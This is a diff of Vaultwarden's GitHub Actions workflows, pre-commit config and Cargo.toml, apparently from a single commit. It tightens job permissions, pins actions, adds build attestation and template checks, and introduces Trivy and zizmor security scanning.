+          TEST_DB_M_L: ${{ steps.test_sqlite_mysql_postgresql_mimalloc_logger.outcome }}
+          TEST_DB_M: ${{ steps.test_sqlite_mysql_postgresql_mimalloc.outcome }}
+          TEST_DB: ${{ steps.test_sqlite_mysql_postgresql.outcome }}
+          TEST_SQLITE: ${{ steps.test_sqlite.outcome }}
+          TEST_MYSQL: ${{ steps.test_mysql.outcome }}
+          TEST_POSTGRESQL: ${{ steps.test_postgresql.outcome }}
+          CLIPPY: ${{ steps.clippy.outcome }}
+          FMT: ${{ steps.formatting.outcome }}
         run: |
-          echo "### :x: Checks Failed!" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "|Job|Status|" >> $GITHUB_STEP_SUMMARY
-          echo "|---|------|" >> $GITHUB_STEP_SUMMARY
-          echo "|test (sqlite,mysql,postgresql,enable_mimalloc)|${{ steps.test_sqlite_mysql_postgresql_mimalloc.outcome }}|" >> $GITHUB_STEP_SUMMARY
-          echo "|test (sqlite,mysql,postgresql)|${{ steps.test_sqlite_mysql_postgresql.outcome }}|" >> $GITHUB_STEP_SUMMARY
-          echo "|test (sqlite)|${{ steps.test_sqlite.outcome }}|" >> $GITHUB_STEP_SUMMARY
-          echo "|test (mysql)|${{ steps.test_mysql.outcome }}|" >> $GITHUB_STEP_SUMMARY
-          echo "|test (postgresql)|${{ steps.test_postgresql.outcome }}|" >> $GITHUB_STEP_SUMMARY
-          echo "|clippy (sqlite,mysql,postgresql,enable_mimalloc)|${{ steps.clippy.outcome }}|" >> $GITHUB_STEP_SUMMARY
-          echo "|fmt|${{ steps.formatting.outcome }}|" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
-          echo "Please check the failed jobs and fix where needed." >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
+          echo "### :x: Checks Failed!" >> "${GITHUB_STEP_SUMMARY}"
+          echo "" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|Job|Status|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|---|------|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|test (sqlite,mysql,postgresql,enable_mimalloc,query_logger)|${TEST_DB_M_L}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|test (sqlite,mysql,postgresql,enable_mimalloc)|${TEST_DB_M}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|test (sqlite,mysql,postgresql)|${TEST_DB}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|test (sqlite)|${TEST_SQLITE}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|test (mysql)|${TEST_MYSQL}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|test (postgresql)|${TEST_POSTGRESQL}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|clippy (sqlite,mysql,postgresql,enable_mimalloc)|${CLIPPY}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "|fmt|${FMT}|" >> "${GITHUB_STEP_SUMMARY}"
+          echo "" >> "${GITHUB_STEP_SUMMARY}"
+          echo "Please check the failed jobs and fix where needed." >> "${GITHUB_STEP_SUMMARY}"
+          echo "" >> "${GITHUB_STEP_SUMMARY}"
           exit 1
 
 
@@ -193,5 +220,5 @@ jobs:
       - name: "All checks passed"
         if: ${{ success() }}
         run: |
-          echo "### :tada: Checks Passed!" >> $GITHUB_STEP_SUMMARY
-          echo "" >> $GITHUB_STEP_SUMMARY
+          echo "### :tada: Checks Passed!" >> "${GITHUB_STEP_SUMMARY}"
+          echo "" >> "${GITHUB_STEP_SUMMARY}"
```

.github/workflows/check-templates.yml (new file, 29 lines)

```diff
@@ -0,0 +1,29 @@
+name: Check templates
+permissions: {}
+
+on: [ push, pull_request ]
+
+jobs:
+  docker-templates:
+    name: Validate docker templates
+    permissions:
+      contents: read
+    runs-on: ubuntu-24.04
+    timeout-minutes: 30
+
+    steps:
+      # Checkout the repo
+      - name: "Checkout"
+        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
+        with:
+          persist-credentials: false
+      # End Checkout the repo
+
+      - name: Run make to rebuild templates
+        working-directory: docker
+        run: make
+
+      - name: Check for unstaged changes
+        working-directory: docker
+        run: git diff --exit-code
+        continue-on-error: false
```
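
The new workflow is a standard generate-and-diff check: regenerate the Dockerfiles from their template, then let `git diff --exit-code` fail the job if the committed output has drifted. The same check can be run locally before pushing (assuming the repo's `docker/Makefile` is present):

```sh
# Rebuild the generated Dockerfiles and fail if they differ from what is committed.
cd docker
make
git diff --exit-code . || echo "templates out of date; commit the regenerated files"
```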

.github/workflows/hadolint.yml (46 changed lines)

```diff
@@ -1,20 +1,28 @@
 name: Hadolint
+permissions: {}
 
-on: [
-    push,
-    pull_request
-  ]
+on: [ push, pull_request ]
 
 jobs:
   hadolint:
     name: Validate Dockerfile syntax
-    runs-on: ubuntu-22.04
+    permissions:
+      contents: read
+    runs-on: ubuntu-24.04
     timeout-minutes: 30
 
     steps:
-      # Checkout the repo
-      - name: Checkout
-        uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
-      # End Checkout the repo
+      # Start Docker Buildx
+      - name: Setup Docker Buildx
+        uses: docker/setup-buildx-action@e468171a9de216ec08956ac3ada2f0791b6bd435 # v3.11.1
+        # https://github.com/moby/buildkit/issues/3969
+        # Also set max parallelism to 2, the default of 4 breaks GitHub Actions and causes OOMKills
+        with:
+          buildkitd-config-inline: |
+            [worker.oci]
+              max-parallelism = 2
+          driver-opts: |
+            network=host
 
       # Download hadolint - https://github.com/hadolint/hadolint/releases
       - name: Download hadolint
@@ -25,9 +33,25 @@ jobs:
         env:
           HADOLINT_VERSION: 2.12.0
       # End Download hadolint
+
+      # Checkout the repo
+      - name: Checkout
+        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
+        with:
+          persist-credentials: false
+      # End Checkout the repo
 
-      # Test Dockerfiles
+      # Test Dockerfiles with hadolint
       - name: Run hadolint
         shell: bash
         run: hadolint docker/Dockerfile.{debian,alpine}
-      # End Test Dockerfiles
+      # End Test Dockerfiles with hadolint
+
+      # Test Dockerfiles with docker build checks
+      - name: Run docker build check
+        shell: bash
+        run: |
+          echo "Checking docker/Dockerfile.debian"
+          docker build --check . -f docker/Dockerfile.debian
+          echo "Checking docker/Dockerfile.alpine"
+          docker build --check . -f docker/Dockerfile.alpine
+      # End Test Dockerfiles with docker build checks
```
208
.github/workflows/release.yml
vendored
208
.github/workflows/release.yml
vendored
@@ -1,4 +1,5 @@
 name: Release
+permissions: {}
 
 on:
   push:
@@ -6,17 +7,23 @@ on:
       - main
 
     tags:
-      - '*'
+      # https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions#filter-pattern-cheat-sheet
+      - '[1-2].[0-9]+.[0-9]+'
 
 jobs:
   # https://github.com/marketplace/actions/skip-duplicate-actions
   # Some checks to determine if we need to continue with building a new docker.
   # We will skip this check if we are creating a tag, because that has the same hash as a previous run already.
   skip_check:
-    runs-on: ubuntu-22.04
+    # Only run this in the upstream repo and not on forks
     if: ${{ github.repository == 'dani-garcia/vaultwarden' }}
+    name: Cancel older jobs when running
+    permissions:
+      actions: write
+    runs-on: ubuntu-24.04
     outputs:
       should_skip: ${{ steps.skip_check.outputs.should_skip }}
 
     steps:
       - name: Skip Duplicates Actions
         id: skip_check
@@ -27,14 +34,20 @@ jobs:
         if: ${{ github.ref_type == 'branch' }}
 
   docker-build:
-    runs-on: ubuntu-22.04
-    timeout-minutes: 120
     needs: skip_check
     if: ${{ needs.skip_check.outputs.should_skip != 'true' && github.repository == 'dani-garcia/vaultwarden' }}
-    # Start a local docker registry to extract the final Alpine static build binaries
+    name: Build Vaultwarden containers
+    permissions:
+      packages: write
+      contents: read
+      attestations: write
+      id-token: write
+    runs-on: ubuntu-24.04
+    timeout-minutes: 120
+    # Start a local docker registry to extract the compiled binaries to upload as artifacts and attest them
     services:
       registry:
-        image: registry:2
+        image: registry@sha256:1fc7de654f2ac1247f0b67e8a459e273b0993be7d2beda1f3f56fbf1001ed3e7 # v3.0.0
         ports:
           - 5000:5000
     env:
@@ -56,37 +69,42 @@ jobs:
         base_image: ["debian","alpine"]
 
     steps:
-      # Checkout the repo
-      - name: Checkout
-        uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 # v4.1.1
-        with:
-          fetch-depth: 0
-
       - name: Initialize QEMU binfmt support
-        uses: docker/setup-qemu-action@68827325e0b33c7199eb31dd4e31fbe9023e06e3 # v3.0.0
+        uses: docker/setup-qemu-action@29109295f81e9208d7d86ff1c6c12d2833863392 # v3.6.0
         with:
          platforms: "arm64,arm"
 
       # Start Docker Buildx
       - name: Setup Docker Buildx
-        uses: docker/setup-buildx-action@f95db51fddba0c2d1ec667646a06c2ce06100226 # v3.0.0
+        uses: docker/setup-buildx-action@e468171a9de216ec08956ac3ada2f0791b6bd435 # v3.11.1
         # https://github.com/moby/buildkit/issues/3969
-        # Also set max parallelism to 2, the default of 4 breaks GitHub Actions
+        # Also set max parallelism to 2, the default of 4 breaks GitHub Actions and causes OOMKills
         with:
-          config-inline: |
+          cache-binary: false
+          buildkitd-config-inline: |
             [worker.oci]
               max-parallelism = 2
           driver-opts: |
             network=host
 
+      # Checkout the repo
+      - name: Checkout
+        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
+        # We need fetch-depth of 0 so we also get all the tag metadata
+        with:
+          persist-credentials: false
+          fetch-depth: 0
+
       # Determine Base Tags and Source Version
       - name: Determine Base Tags and Source Version
         shell: bash
+        env:
+          REF_TYPE: ${{ github.ref_type }}
         run: |
-          # Check which main tag we are going to build determined by github.ref_type
-          if [[ "${{ github.ref_type }}" == "tag" ]]; then
+          # Check which main tag we are going to build determined by ref_type
+          if [[ "${REF_TYPE}" == "tag" ]]; then
             echo "BASE_TAGS=latest,${GITHUB_REF#refs/*/}" | tee -a "${GITHUB_ENV}"
-          elif [[ "${{ github.ref_type }}" == "branch" ]]; then
+          elif [[ "${REF_TYPE}" == "branch" ]]; then
             echo "BASE_TAGS=testing" | tee -a "${GITHUB_ENV}"
           fi
 
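The tag name in `BASE_TAGS` comes from the shell's shortest-prefix removal: `${GITHUB_REF#refs/*/}` strips the leading `refs/tags/` (or `refs/heads/`) component. A standalone illustration with a hypothetical ref value:

```bash
# "#refs/*/" removes the shortest leading match of the pattern "refs/*/",
# so only the final tag (or branch) name remains.
GITHUB_REF="refs/tags/1.34.0"   # hypothetical example value
echo "${GITHUB_REF#refs/*/}"    # prints: 1.34.0
```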
@@ -102,7 +120,7 @@ jobs:
 
       # Login to Docker Hub
       - name: Login to Docker Hub
-        uses: docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d # v3.0.0
+        uses: docker/login-action@74a5d142397b4f367a81961eba4e8cd7edddf772 # v3.4.0
         with:
           username: ${{ secrets.DOCKERHUB_USERNAME }}
           password: ${{ secrets.DOCKERHUB_TOKEN }}
@@ -111,12 +129,14 @@ jobs:
       - name: Add registry for DockerHub
         if: ${{ env.HAVE_DOCKERHUB_LOGIN == 'true' }}
         shell: bash
+        env:
+          DOCKERHUB_REPO: ${{ vars.DOCKERHUB_REPO }}
         run: |
-          echo "CONTAINER_REGISTRIES=${{ vars.DOCKERHUB_REPO }}" | tee -a "${GITHUB_ENV}"
+          echo "CONTAINER_REGISTRIES=${DOCKERHUB_REPO}" | tee -a "${GITHUB_ENV}"
 
       # Login to GitHub Container Registry
       - name: Login to GitHub Container Registry
-        uses: docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d # v3.0.0
+        uses: docker/login-action@74a5d142397b4f367a81961eba4e8cd7edddf772 # v3.4.0
         with:
           registry: ghcr.io
           username: ${{ github.repository_owner }}
@@ -126,18 +146,14 @@ jobs:
       - name: Add registry for ghcr.io
         if: ${{ env.HAVE_GHCR_LOGIN == 'true' }}
         shell: bash
+        env:
+          GHCR_REPO: ${{ vars.GHCR_REPO }}
         run: |
-          echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${{ vars.GHCR_REPO }}" | tee -a "${GITHUB_ENV}"
-
-      - name: Add registry for ghcr.io
-        if: ${{ env.HAVE_GHCR_LOGIN == 'true' }}
-        shell: bash
-        run: |
-          echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${{ vars.GHCR_REPO }}" | tee -a "${GITHUB_ENV}"
+          echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${GHCR_REPO}" | tee -a "${GITHUB_ENV}"
 
       # Login to Quay.io
       - name: Login to Quay.io
-        uses: docker/login-action@343f7c4344506bcbf9b4de18042ae17996df046d # v3.0.0
+        uses: docker/login-action@74a5d142397b4f367a81961eba4e8cd7edddf772 # v3.4.0
         with:
           registry: quay.io
           username: ${{ secrets.QUAY_USERNAME }}
@@ -147,17 +163,22 @@ jobs:
       - name: Add registry for Quay.io
         if: ${{ env.HAVE_QUAY_LOGIN == 'true' }}
         shell: bash
+        env:
+          QUAY_REPO: ${{ vars.QUAY_REPO }}
         run: |
-          echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${{ vars.QUAY_REPO }}" | tee -a "${GITHUB_ENV}"
+          echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}${QUAY_REPO}" | tee -a "${GITHUB_ENV}"
 
       - name: Configure build cache from/to
         shell: bash
+        env:
+          GHCR_REPO: ${{ vars.GHCR_REPO }}
+          BASE_IMAGE: ${{ matrix.base_image }}
         run: |
           #
           # Check if there is a GitHub Container Registry Login and use it for caching
           if [[ -n "${HAVE_GHCR_LOGIN}" ]]; then
-            echo "BAKE_CACHE_FROM=type=registry,ref=${{ vars.GHCR_REPO }}-buildcache:${{ matrix.base_image }}" | tee -a "${GITHUB_ENV}"
-            echo "BAKE_CACHE_TO=type=registry,ref=${{ vars.GHCR_REPO }}-buildcache:${{ matrix.base_image }},mode=max" | tee -a "${GITHUB_ENV}"
+            echo "BAKE_CACHE_FROM=type=registry,ref=${GHCR_REPO}-buildcache:${BASE_IMAGE}" | tee -a "${GITHUB_ENV}"
+            echo "BAKE_CACHE_TO=type=registry,ref=${GHCR_REPO}-buildcache:${BASE_IMAGE},compression=zstd,mode=max" | tee -a "${GITHUB_ENV}"
           else
             echo "BAKE_CACHE_FROM="
             echo "BAKE_CACHE_TO="
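The repeated `${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}` expansion in these steps is a comma-join idiom: the `:+` form expands to the current value plus a trailing comma only when the variable is already non-empty, so the first registry never gets a leading comma. A standalone sketch with assumed registry names:

```bash
# ${VAR:+alt} expands to "alt" only if VAR is set and non-empty.
CONTAINER_REGISTRIES=""
CONTAINER_REGISTRIES="${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}docker.io/vaultwarden/server"
CONTAINER_REGISTRIES="${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}ghcr.io/dani-garcia/vaultwarden"
echo "${CONTAINER_REGISTRIES}"
# prints: docker.io/vaultwarden/server,ghcr.io/dani-garcia/vaultwarden
```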
@@ -165,13 +186,13 @@ jobs:
           #
 
       - name: Add localhost registry
-        if: ${{ matrix.base_image == 'alpine' }}
         shell: bash
         run: |
           echo "CONTAINER_REGISTRIES=${CONTAINER_REGISTRIES:+${CONTAINER_REGISTRIES},}localhost:5000/vaultwarden/server" | tee -a "${GITHUB_ENV}"
 
       - name: Bake ${{ matrix.base_image }} containers
-        uses: docker/bake-action@849707117b03d39aba7924c50a10376a69e88d7d # v4.1.0
+        id: bake_vw
+        uses: docker/bake-action@37816e747588cb137173af99ab33873600c46ea8 # v6.8.0
         env:
           BASE_TAGS: "${{ env.BASE_TAGS }}"
           SOURCE_COMMIT: "${{ env.SOURCE_COMMIT }}"
@@ -181,78 +202,121 @@ jobs:
         with:
           pull: true
           push: true
+          source: .
           files: docker/docker-bake.hcl
           targets: "${{ matrix.base_image }}-multi"
           set: |
             *.cache-from=${{ env.BAKE_CACHE_FROM }}
             *.cache-to=${{ env.BAKE_CACHE_TO }}
 
+      - name: Extract digest SHA
+        shell: bash
+        env:
+          BAKE_METADATA: ${{ steps.bake_vw.outputs.metadata }}
+          BASE_IMAGE: ${{ matrix.base_image }}
+        run: |
+          GET_DIGEST_SHA="$(jq -r --arg base "$BASE_IMAGE" '.[$base + "-multi"]."containerimage.digest"' <<< "${BAKE_METADATA}")"
+          echo "DIGEST_SHA=${GET_DIGEST_SHA}" | tee -a "${GITHUB_ENV}"
+
+      # Attest container images
+      - name: Attest - docker.io - ${{ matrix.base_image }}
+        if: ${{ env.HAVE_DOCKERHUB_LOGIN == 'true' && steps.bake_vw.outputs.metadata != ''}}
+        uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
+        with:
+          subject-name: ${{ vars.DOCKERHUB_REPO }}
+          subject-digest: ${{ env.DIGEST_SHA }}
+          push-to-registry: true
+
+      - name: Attest - ghcr.io - ${{ matrix.base_image }}
+        if: ${{ env.HAVE_GHCR_LOGIN == 'true' && steps.bake_vw.outputs.metadata != ''}}
+        uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
+        with:
+          subject-name: ${{ vars.GHCR_REPO }}
+          subject-digest: ${{ env.DIGEST_SHA }}
+          push-to-registry: true
+
+      - name: Attest - quay.io - ${{ matrix.base_image }}
+        if: ${{ env.HAVE_QUAY_LOGIN == 'true' && steps.bake_vw.outputs.metadata != ''}}
+        uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
+        with:
+          subject-name: ${{ vars.QUAY_REPO }}
+          subject-digest: ${{ env.DIGEST_SHA }}
+          push-to-registry: true
+
 
       # Extract the Alpine binaries from the containers
       - name: Extract binaries
-        if: ${{ matrix.base_image == 'alpine' }}
         shell: bash
+        env:
+          REF_TYPE: ${{ github.ref_type }}
+          BASE_IMAGE: ${{ matrix.base_image }}
         run: |
-          # Check which main tag we are going to build determined by github.ref_type
-          if [[ "${{ github.ref_type }}" == "tag" ]]; then
+          # Check which main tag we are going to build determined by ref_type
+          if [[ "${REF_TYPE}" == "tag" ]]; then
             EXTRACT_TAG="latest"
-          elif [[ "${{ github.ref_type }}" == "branch" ]]; then
+          elif [[ "${REF_TYPE}" == "branch" ]]; then
             EXTRACT_TAG="testing"
           fi
 
+          # Check which base_image was used and append -alpine if needed
+          if [[ "${BASE_IMAGE}" == "alpine" ]]; then
+            EXTRACT_TAG="${EXTRACT_TAG}-alpine"
+          fi
+
           # After each extraction the image is removed.
           # This is needed because using different platforms doesn't trigger a new pull/download
 
           # Extract amd64 binary
-          docker create --name amd64 --platform=linux/amd64 "vaultwarden/server:${EXTRACT_TAG}-alpine"
-          docker cp amd64:/vaultwarden vaultwarden-amd64
+          docker create --name amd64 --platform=linux/amd64 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
+          docker cp amd64:/vaultwarden vaultwarden-amd64-${BASE_IMAGE}
           docker rm --force amd64
-          docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
+          docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
 
           # Extract arm64 binary
-          docker create --name arm64 --platform=linux/arm64 "vaultwarden/server:${EXTRACT_TAG}-alpine"
-          docker cp arm64:/vaultwarden vaultwarden-arm64
+          docker create --name arm64 --platform=linux/arm64 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
+          docker cp arm64:/vaultwarden vaultwarden-arm64-${BASE_IMAGE}
           docker rm --force arm64
-          docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
+          docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
 
           # Extract armv7 binary
-          docker create --name armv7 --platform=linux/arm/v7 "vaultwarden/server:${EXTRACT_TAG}-alpine"
-          docker cp armv7:/vaultwarden vaultwarden-armv7
+          docker create --name armv7 --platform=linux/arm/v7 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
+          docker cp armv7:/vaultwarden vaultwarden-armv7-${BASE_IMAGE}
           docker rm --force armv7
-          docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
+          docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
 
           # Extract armv6 binary
-          docker create --name armv6 --platform=linux/arm/v6 "vaultwarden/server:${EXTRACT_TAG}-alpine"
-          docker cp armv6:/vaultwarden vaultwarden-armv6
+          docker create --name armv6 --platform=linux/arm/v6 "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
+          docker cp armv6:/vaultwarden vaultwarden-armv6-${BASE_IMAGE}
           docker rm --force armv6
-          docker rmi --force "vaultwarden/server:${EXTRACT_TAG}-alpine"
+          docker rmi --force "localhost:5000/vaultwarden/server:${EXTRACT_TAG}"
 
-      # Upload artifacts to Github Actions
-      - name: "Upload amd64 artifact"
-        uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
-        if: ${{ matrix.base_image == 'alpine' }}
+      # Upload artifacts to Github Actions and Attest the binaries
+      - name: "Upload amd64 artifact ${{ matrix.base_image }}"
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
         with:
-          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-amd64
-          path: vaultwarden-amd64
+          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-amd64-${{ matrix.base_image }}
+          path: vaultwarden-amd64-${{ matrix.base_image }}
 
-      - name: "Upload arm64 artifact"
-        uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
-        if: ${{ matrix.base_image == 'alpine' }}
+      - name: "Upload arm64 artifact ${{ matrix.base_image }}"
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
         with:
-          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-arm64
-          path: vaultwarden-arm64
+          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-arm64-${{ matrix.base_image }}
+          path: vaultwarden-arm64-${{ matrix.base_image }}
 
-      - name: "Upload armv7 artifact"
-        uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
-        if: ${{ matrix.base_image == 'alpine' }}
+      - name: "Upload armv7 artifact ${{ matrix.base_image }}"
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
         with:
-          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv7
-          path: vaultwarden-armv7
+          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv7-${{ matrix.base_image }}
+          path: vaultwarden-armv7-${{ matrix.base_image }}
 
-      - name: "Upload armv6 artifact"
-        uses: actions/upload-artifact@5d5d22a31266ced268874388b861e4b58bb5c2f3 # v4.3.1
-        if: ${{ matrix.base_image == 'alpine' }}
+      - name: "Upload armv6 artifact ${{ matrix.base_image }}"
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
         with:
-          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv6
-          path: vaultwarden-armv6
+          name: vaultwarden-${{ env.SOURCE_VERSION }}-linux-armv6-${{ matrix.base_image }}
+          path: vaultwarden-armv6-${{ matrix.base_image }}
 
+      - name: "Attest artifacts ${{ matrix.base_image }}"
+        uses: actions/attest-build-provenance@e8998f949152b193b063cb0ec769d69d929409be # v2.4.0
+        with:
+          subject-path: vaultwarden-*
       # End Upload artifacts to Github Actions
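The `Extract digest SHA` step above feeds the bake metadata JSON through jq; the filter can be tested in isolation against a stub document (the metadata shape below is a trimmed assumption, not verbatim buildx output):

```bash
# Assumed, trimmed shape of `steps.bake_vw.outputs.metadata`; the real
# output contains many more keys per bake target.
BAKE_METADATA='{"debian-multi":{"containerimage.digest":"sha256:deadbeef"}}'
BASE_IMAGE="debian"
jq -r --arg base "$BASE_IMAGE" '.[$base + "-multi"]."containerimage.digest"' <<< "${BAKE_METADATA}"
# prints: sha256:deadbeef
```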
.github/workflows/releasecache-cleanup.yml (vendored): 8 lines changed
@@ -1,3 +1,6 @@
+name: Cleanup
+permissions: {}
+
 on:
   workflow_dispatch:
     inputs:
@@ -9,11 +12,12 @@ on:
   schedule:
     - cron: '0 1 * * FRI'
 
-name: Cleanup
 jobs:
   releasecache-cleanup:
     name: Releasecache Cleanup
-    runs-on: ubuntu-22.04
+    permissions:
+      packages: write
+    runs-on: ubuntu-24.04
     continue-on-error: true
     timeout-minutes: 30
     steps:
.github/workflows/trivy.yml (vendored): 39 lines changed
@@ -1,34 +1,45 @@
-name: trivy
+name: Trivy
+permissions: {}
 
 on:
   push:
     branches:
       - main
 
     tags:
       - '*'
-  pull_request:
-    branches: [ "main" ]
-  schedule:
-    - cron: '00 12 * * *'
 
-permissions:
-  contents: read
+  pull_request:
+    branches:
+      - main
+
+  schedule:
+    - cron: '08 11 * * *'
 
 jobs:
   trivy-scan:
-    name: Check
-    runs-on: ubuntu-22.04
-    timeout-minutes: 30
+    # Only run this in the upstream repo and not on forks
+    # When all forks run this at the same time, it is causing `Too Many Requests` issues
+    if: ${{ github.repository == 'dani-garcia/vaultwarden' }}
+    name: Trivy Scan
     permissions:
       contents: read
-      security-events: write
       actions: read
+      security-events: write
+    runs-on: ubuntu-24.04
+    timeout-minutes: 30
 
     steps:
       - name: Checkout code
-        uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11 #v4.1.1
+        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 #v4.2.2
+        with:
+          persist-credentials: false
 
       - name: Run Trivy vulnerability scanner
-        uses: aquasecurity/trivy-action@d43c1f16c00cfd3978dde6c07f4bbcf9eb6993ca # v0.16.1
+        uses: aquasecurity/trivy-action@dc5a429b52fcf669ce959baa2c2dd26090d2a6c4 # v0.32.0
+        env:
+          TRIVY_DB_REPOSITORY: docker.io/aquasec/trivy-db:2,public.ecr.aws/aquasecurity/trivy-db:2,ghcr.io/aquasecurity/trivy-db:2
+          TRIVY_JAVA_DB_REPOSITORY: docker.io/aquasec/trivy-java-db:1,public.ecr.aws/aquasecurity/trivy-java-db:1,ghcr.io/aquasecurity/trivy-java-db:1
         with:
           scan-type: repo
           ignore-unfixed: true
@@ -37,6 +48,6 @@ jobs:
           severity: CRITICAL,HIGH
 
       - name: Upload Trivy scan results to GitHub Security tab
-        uses: github/codeql-action/upload-sarif@b7bf0a3ed3ecfa44160715d7c442788f65f0f923 # v3.23.2
+        uses: github/codeql-action/upload-sarif@181d5eefc20863364f96762470ba6f862bdef56b # v3.29.2
         with:
           sarif_file: 'trivy-results.sarif'
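An equivalent scan can be run locally with the Trivy CLI (a sketch; the flags mirror the workflow inputs and assume Trivy is installed):

```bash
# Scan the working tree the same way the workflow does: a repository scan
# reporting only unpatched CRITICAL and HIGH findings.
trivy repository --ignore-unfixed --severity CRITICAL,HIGH .
```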
.github/workflows/zizmor.yml (vendored, new file): 28 lines added
@@ -0,0 +1,28 @@
+name: Security Analysis with zizmor
+
+on:
+  push:
+    branches: ["main"]
+  pull_request:
+    branches: ["**"]
+
+permissions: {}
+
+jobs:
+  zizmor:
+    name: Run zizmor
+    runs-on: ubuntu-latest
+    permissions:
+      security-events: write
+    steps:
+      - name: Checkout repository
+        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+        with:
+          persist-credentials: false
+
+      - name: Run zizmor
+        uses: zizmorcore/zizmor-action@f52a838cfabf134edcbaa7c8b3677dde20045018 # v0.1.1
+        with:
+          # intentionally not scanning the entire repository,
+          # since it contains integration tests.
+          inputs: ./.github/
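The same analysis can be run locally before opening a pull request (a sketch; assumes the zizmor CLI is installed, for example via `cargo install zizmor`):

```bash
# Statically analyze only the workflow directory, matching the action's
# `inputs: ./.github/` setting above.
zizmor ./.github/
```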
.pre-commit-config.yaml
@@ -1,7 +1,7 @@
 ---
 repos:
   - repo: https://github.com/pre-commit/pre-commit-hooks
-    rev: v4.5.0
+    rev: v5.0.0
     hooks:
       - id: check-yaml
       - id: check-json
@@ -31,7 +31,7 @@ repos:
         language: system
         args: ["--features", "sqlite,mysql,postgresql,enable_mimalloc", "--"]
         types_or: [rust, file]
-        files: (Cargo.toml|Cargo.lock|rust-toolchain|.*\.rs$)
+        files: (Cargo.toml|Cargo.lock|rust-toolchain.toml|rustfmt.toml|.*\.rs$)
         pass_filenames: false
       - id: cargo-clippy
         name: cargo clippy
@@ -40,5 +40,13 @@ repos:
         language: system
         args: ["--features", "sqlite,mysql,postgresql,enable_mimalloc", "--", "-D", "warnings"]
         types_or: [rust, file]
-        files: (Cargo.toml|Cargo.lock|rust-toolchain|clippy.toml|.*\.rs$)
+        files: (Cargo.toml|Cargo.lock|rust-toolchain.toml|rustfmt.toml|.*\.rs$)
         pass_filenames: false
+      - id: check-docker-templates
+        name: check docker templates
+        description: Check if the Docker templates are updated
+        language: system
+        entry: sh
+        args:
+          - "-c"
+          - "cd docker && make"
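The new hook can be exercised on its own with the pre-commit CLI (a sketch; assumes pre-commit is installed):

```bash
# Runs only the docker-template hook; it fails when `cd docker && make`
# regenerates Dockerfiles that differ from what is committed.
pre-commit run check-docker-templates --all-files
```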
Cargo.lock (generated): 3992 lines changed (file diff suppressed because it is too large)
Cargo.toml: 183 lines changed
@@ -1,9 +1,12 @@
+[workspace]
+members = ["macros"]
+
 [package]
 name = "vaultwarden"
 version = "1.0.0"
